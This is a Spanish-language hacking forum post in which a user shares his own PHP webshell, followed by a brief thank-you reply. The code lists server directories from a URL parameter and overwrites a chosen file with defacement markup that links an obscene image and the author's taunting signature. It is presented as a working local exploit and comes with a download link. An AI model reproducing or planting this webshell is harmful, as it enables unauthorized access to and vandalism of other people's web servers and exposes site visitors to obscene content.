Buenas, hace mucho que no ando por estos lados, por el foro de antrax :D , bueno, aca les traigo un proyectito que estoy programando en php. Es simplemente una webshell, que permite, reconocer directorios, y si existen, muestra los archivos, tambien sirve para modificar algun que otro archivo, poniendole su respectiva funcion. esto simplemente es como una version BETA, pero funciona muy bien.
Aclaracion: Funciona como Local exploit, con permisos 0644, pero para usarla 100% bién deberiamos tener 0777.
<?php
// v3n0m's shell :)
$dir=$_GET['dir'];
$fil=$_GET['f1'];
if(is_dir($_GET['dir'])){
echo "el directorio ".$dir." existe :)";
echo "<br>.... mostrando el contenido :) <br><br>";
$h = opendir($dir);
while ($f = readdir($h)){
if($f != "." && $f != ".."){
echo $f."<br>";
}
}
if(isset($fil)){
if(file_exists($dir.$fil)){
$arch=$dir.$fil;
$fo = fopen($arch, "w");
$fw = "<br><center><img src=\"http://images01.olx.cl/ui/7/11/32/1287063931_128720932_3-Mi-pene-erecto-Hombre-busca-mujer.jpg\"><br><h1>I GOT FOR YOUU :D</h1><br>v3n0m was here kingstonn bitch :$<br>";
if(fwrite($fo,$fw)){
echo "Se modifico el archivo ".$arch." ;) ";
fclose($arch);
}else{
echo "No se pudo escribir en el archivo ".$arch;
}
}else{
echo "el archivo ".$dir.$fil." no existe!";
}
}
}else{
echo "el directorio ".$dir." no existe u.u";
}
echo "<br><br><br><center><code>c0ded by v3n0m</code>";
?>
Download : http://venom.fallensecurity.org/dir.txt (http://venom.fallensecurity.org/dir.txt)
Más info: http://v3n0mb0x.blogspot.com/2011/06/v3n0ms-shell-v001.html (http://v3n0mb0x.blogspot.com/2011/06/v3n0ms-shell-v001.html)
Saludos ;)
v3n0m!!! tanto tiempo!
que bueno verte aca en el foro!
muchisimas gracias por el aporte y espero que te pases seguido por aca!!